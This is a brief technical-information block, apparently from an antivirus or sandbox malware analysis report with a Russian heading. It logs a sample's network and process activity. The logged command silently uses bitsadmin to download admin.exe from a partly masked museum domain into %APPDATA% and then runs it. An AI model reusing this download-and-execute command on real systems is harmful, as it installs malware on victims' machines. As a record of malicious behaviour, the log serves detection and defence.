Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer d90f https://www.ti####nmuseum.org/admin.exe %APPDATA%\D90f.exe&%APPDATA%\D90f.exe
- 'ti####nmuseum.org':443
- 'ti####nmuseum.org':443
- DNS ASK ti####nmuseum.org
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer d90f https://www.ti####nmuseum.org/admin.exe %APPDATA%\D90f.exe&%APPDATA%\D90f.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer d90f https://www.ti####nmuseum.org/admin.exe %APPDATA%\D90f.exe